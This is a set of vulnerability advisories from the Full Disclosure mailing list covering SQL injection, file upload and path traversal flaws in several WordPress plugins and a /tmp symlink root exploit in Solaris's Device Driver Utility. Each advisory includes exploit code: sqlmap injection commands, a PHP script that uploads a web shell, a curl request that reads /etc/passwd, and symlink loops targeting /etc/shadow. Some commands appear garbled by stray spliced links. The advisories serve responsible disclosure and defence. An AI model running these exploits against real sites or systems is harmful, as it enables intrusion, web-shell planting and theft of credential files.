Date: 2015-06-08
Download Site: https://wordpress.org/plugins/easy2map-photos
Vendor: Steven Ellis
Vendor Notified: 2015-06-08, fixed in v1.1.0
Vendor Contact: https://profiles.wordpress.org/stevenellis/
Advisory: http://www.vapid.dhs.org/advisory.php?v=130
Description: Easy2Map Photos is a simple-yet-powerful tool for generating
great-looking geo-tagged photo galleries.
Vulnerability:
The following lines in includes/Functions.php are vulnerable to SQL injection
attack because they aren’t parameterized or sanitizing user input.
48 $wpdb->query(sprintf("UPDATE $mapsTable
49 SET PolyLines = '%s'
50 WHERE ID = '%s';", $PolyLines, $mapID));
218 $wpdb->query(sprintf("
219 UPDATE $mapsTable
220 SET TemplateID = '%s',
221 MapName = '%s',
222 Settings = '%s',
223 CSSValues = '%s',
224 CSSValuesPhoto = '%s',
225 CSSValuesMap = '%s',
226 MapHTML = '%s',
227 IsActive = 1
228 WHERE ID = %s;",
229 $_REQUEST['mapTemplateName'],
230 $_REQUEST['mapName'],
231 urldecode($_REQUEST['mapSettingsXML']),
232 urldecode($_REQUEST["parentCSSXML"]),
233 urldecode($_REQUEST["photoCSSXML"]),
234 urldecode($_REQUEST["mapCSSXML"]),
235 urldecode($_REQUEST["mapHTML"]), $mapID));
238 //this is a map insert
239 if (!$wpdb->query(sprintf("
240 INSERT INTO $mapsTable(
241 TemplateID,
242 MapName,
243 DefaultPinImage,
244 Settings,
245 LastInvoked,
246 PolyLines,
247 CSSValues,
248 CSSValuesPhoto,
249 CSSValuesMap,
250 MapHTML,
251 IsActive
252 ) VALUES ('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s',
'%s', 0);",
253 $_REQUEST['mapTemplateName'],
254 $_REQUEST['mapName’]
331 $wpdb->query(sprintf("
332 UPDATE $mapsTable
333 SET MapName = '%s'
334 IsActive = 1
335 WHERE ID = %s;",
336 $_REQUEST['mapName'],
337 $mapID));
Also
In MapPinImageUpload.php and MapPinIconSave.php this code would allow someone
to create files outside of the intended upload directory by adding ../../../../
path traversal characters:
if (!file_exists($imagesDirectory)) {
mkdir($imagesDirectory);
}
CVEID: 2015-4615 2015-4617
OSVDB:
Exploit Code:
• $ sqlmap -u 'http://wp.site:80/wp-admin/admin-ajax.php'
--data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name"
--cookie=COOKIE HERE --level=5 --risk=3
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Remote file upload vulnerability & SQLi in wordpress plugin wp-powerplaygallery v3.3
Title: Remote file upload vulnerability & SQLi in wordpress plugin
wp-powerplaygallery v3.3
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-27
Download Site: https://wordpress.org/plugins/wp-powerplaygallery
Vendor: WP SlideShow
Vendor Notified: 2015-06-29
Advisory: http://www.vapid.dhs.org/advisory.php?v=132
Vendor Contact: plug...@wordpress.org
Description: This is the best gallery for touch screens. It is fully touch
enabled with great features. This gallery is compatible wiht iphone and ipads.
It is also allow us to use it as a widget.You can also enable this Powerplay
Gallery on your wordpress site by placing code snippet in your template (.php)
files. It shows flash gallery for desktops and touch enabled version for ipad
and iphones.
Vulnerability:
1. Ability to create directories out side of the upload path by using ../:
Lines 56-59 of upload.php:
56 // Create target dir
57 if (!file_exists($targetDir)) {
58 @mkdir($targetDir);
59 }
2. Arbitrary file uploads to a path in the web root directory:
Lines 138-160 of uploads.php don’t verify what types of files are allowed or
where they should be placed:
138 // Open temp file
139 if (!$out = @fopen("{$filePath}.part", $chunks ? "ab" : "wb")) {
140 die('{"jsonrpc" : "2.0", "error" : {"code": 102, "message": "Failed
to open output stream."}, "id" : "id"}');
141 }
142
143 if (!empty($_FILES)) {
144 if ($_FILES["file"]["error"] ||
!is_uploaded_file($_FILES["file"]["tmp_name"])) {
145 die('{"jsonrpc" : "2.0", "error" : {"code": 103, "message":
"Failed to move uploaded file."}, "id" : "id"}');
146 }
147
148 // Read binary input stream and append it to temp file
149 if (!$in = @fopen($_FILES["file"]["tmp_name"], "rb")) {
150 die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message":
"Failed to open input stream."}, "id" : "id"}');
151 }
152 } else {
153 if (!$in = @fopen("php://input", "rb")) {
154 die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message":
"Failed to open input stream."}, "id" : "id"}');
155 }
156 }
157
158 while ($buff = fread($in, 4096)) {
159 fwrite($out, $buff);
160 }
3. Sql injection
Lines 131-135 of upload.php fail to handle user input appropriately either by
sanitizing or paramaterizing it. Injection points are
any GET/POST to albumid or name.
131 $query = "INSERT INTO ".$wpdb->prefix."pp_images (`category_id`, `title`,
`description`, `price`, `thumb`, `image`, `status`, `order`,
`creation_date` )
132 VALUES
(".$_REQUEST['albumid'].",'".$imgname[0]."','".$imgname[0]."','','".$resize."','".$_REQUEST
['name']."',1,'','NULL')";
133
134 $wpdb->query($query);
135
CVEID:
OSVDB:
Exploit Code:
• http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big
• ->301 exists else 404 doesn't.
• shell is
http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big/shell.php
• */
•
•
• $target_url =
'http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php';
• $file_name_with_full_path = '/var/www/shell.php';
•
• echo "POST to $target_url $file_name_with_full_path";
• $post = array('albumid'=>'foo' , 'name' =>
'shell.php','file'=>'@'.$file_name_with_full_path);
•
• $ch = curl_init();
• curl_setopt($ch, CURLOPT_URL,$target_url);
• curl_setopt($ch, CURLOPT_POST,1);
• curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
• curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
• $result=curl_exec ($ch);
• curl_close ($ch);
• echo "";
• echo $result;
• echo "";
• ?>
SQLi PoC:
$ sqlmap -u
http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php
--data "albumid=1” —dbms mysql
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Remote file download vulnerability in Wordpress Plugin image-export v1.1
Title: Remote file download vulnerability in Wordpress Plugin image-export v1.1 Author: Larry W. Cashdollar, @_larry0 Date: 2015-07-01 Download Site: https://wordpress.org/plugins/image-export Vendor: www.1efthander.com Vendor Notified: 2015-07-05 Vendor Contact: https://twitter.com/1eftHander Description: Image Export plugin can help you selectively download images uploaded by an administrator . Vulnerability: The code in file download.php doesn't do any checking that the user is requesting files from the uploaded images directory only. And line 8 attempts to unlink the file after being downloaded. This script could be used to delete files out of the wordpress directory if file permissions allow. 1 CVEID: TBD Exploit Code: • $ curl http://example.com/wp-content/plugins/image-export/download.php?file=/etc/passwd Screen Shots: Advisory: http://www.vapid.dhs.org/advisory.php?v=135 ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Remote file upload vulnerability in Wordpress Plugin Mobile App Native 3.0
Title: Remote file upload vulnerability in Wordpress Plugin Mobile App Native 3.0 Vulnerability Date: 2017-02-27 Download: https://wordpress.org/plugins/zen-mobile-app-native/ Vendor: https://profiles.wordpress.org/zendkmobileapp/ Notified: 2017-02-27 Description: Mobile App WordPress plugin lets you turn your website into a full-featured mobile application in minutes using Mobile App Builder. Vulnerability: The code in file ./zen-mobile-app-native/server/images.php doesn't require authentication or check that the user is allowed to upload content. It also doesn't sanitize the file upload against executable code. http://example.com/wordpress/wp-content/plugins/zen-mobile-app-native/server/images.php"; http://example.com/wordpress/wp-content/plugins/zen-mobile-app-native//server/images/8d5e957f297893487bd98fa830fa6413.php https://github.com/lcashdol/Exploits/blob/master/mobile_plugin_exploit.sh URL: http://www.vapidlabs.com/advisory.php?v=178 Credit: Larry W. Cashdollar, @_larry0 ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Insecure /tmp file use in Oracle Solaris 11 Device Driver Utility v1.3.1 leads to root
Title: Insecure /tmp file use in Oracle Solaris 11 Device Driver Utility v1.3.1
leads to root
Author: Larry W. Cashdollar, @_larry0
Date: 2020-02-02
CVE-2020-14724
Download Site: https://docs.oracle.com/cd/E37838_01/html/E69250/useddu.html
Vendor: Oracle, fixed in July 14 2020 CPU
https://www.oracle.com/security-alerts/cpujul2020.html.
Vendor Notified: 2020-02-02
Vendor Contact: secalert...@oracle.com
Advisory: http://www.vapidlabs.com/advisory.php?v=212
Description: "The Device Driver Utility provides information about the devices
on your installed system and the drivers that manage those devices. The DDU
reports whether the currently booted operating system has drivers for all of
the devices that are detected in your system. If a device does not have a
driver attached, the Device Driver Utility recommends a driver package to
install."
Vulnerability:
Append contents of ddu_log to system files via symlink attack:
In ./ddu-text/utils/ddu-text.py
18 LOG_LOCATION = "/tmp/ddu_log" .
45: print _("Exiting Text Installer. Log is available at:\n%s") % LOG_LOCATION
50: logging.basicConfig(filename=LOG_LOCATION, level=LOG_LEVEL,
Elevation of priviledges via symlink attack due to chmod operation on /tmp
file:
In file ./ddu-text/utils/inner_window.py
667: logfile = open('/tmp/ddu_err.log', 'a')
695: logfile = open('/tmp/ddu_err.log', 'a')
721: logfile = open('/tmp/ddu_err.log', 'a')
748: logfile = open('/tmp/ddu_err.log', 'a')
In file ./scripts/comp_lookup.sh
33:typeset err_log=/tmp/ddu_err.log In file ./scripts/det_info.sh
38:typeset err_log=/tmp/ddu_err.log In file ./scripts/pkg_relate.sh
449:typeset err_log=/tmp/ddu_err.log In file ./scripts/find_media.sh
20:typeset err_log=/tmp/ddu_err.log
There is a race condition here between file creation and chmod 666 where a
local user can run a simple script to ensure the symlink exists after the
ddu_err.log file is removed:
In file ./scripts/probe.sh 569:
# Make /tmp/ddu_err.log writable for every user
571: if [ -f /tmp/ddu_err.log ]; then
572: pfexec chmod 666 /tmp/ddu_err.log
574: touch /tmp/ddu_err.log; chmod 666 /tmp/ddu_err.log
636:typeset err_log=/tmp/ddu_err.log
These are also potential file clobbering issues: From probe.sh
131: NIC_info_file=/tmp/dvt_network_info_file
133: temp_file=/tmp/dvt_network_temp
134: temp_file_2=/tmp/dvt_network_temp_2
207: c_file=/tmp/str_ctrl_file
208: c_file1=/tmp/str_ctrl_file_1
209: c_file2=/tmp/str_ctrl_file_2
210: c_file3=/tmp/str_ctrl_file_3
211: c_file4=/tmp/str_ctrl_file_4
212: c_file5=/tmp/str_ctrl_file_5
328: dvt_cd_dev_tmpfile=/tmp/dvt_cd_dev_tmpfile
329: dvt_cd_ctl_tmpfile=/tmp/dvt_cd_ctl_tmpfile
330: dvt_cd_ctl_tmpfile1=/tmp/dvt_cd_ctl_tmpfile1
398: temp_file1=/tmp/dvt_tmp_file1
399: temp_file2=/tmp/dvt_tmp_file2
462: cpu_tmpfile=/tmp/cpu_tmpfile
490: memory_tmpfile=/tmp/memory_tmpfile
624:typeset ctl_file=/tmp/dvt_ctl_file
Exploit Code:
1. Tested on Solaris 11 x86
2. larry@SolSun:~$ uname -a
3. SunOS SolSun 5.11 11.4.0.15.0 i86pc i386 i86pc
4. and
5. Open Indiana
6. root@openindiana:/export/home/larry# uname -a
7. SunOS openindiana 5.11 illumos-1b500975aa i86pc i386 i86pc
9. Append content to /etc/passwd
10. larry@openindiana:/tmp$ ln -s /etc/passwd ddu_log
12. To get local root simply have ddu http://www.php.net/chmod 666 /etc/shadow
13. larry@openindiana:/tmp$ while true; do ln -s /etc/shadow
ddu_err.http://www.php.net/log; done
14.
15. A better exploit:
https://github.com/lcashdol/Exploits/tree/master/ddu-exploit
Patches to OpenIndiana
https://github.com/OpenIndiana/ddu/commit/31dca7f6bee738980ecabefadedd01fcc3f3acf6
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
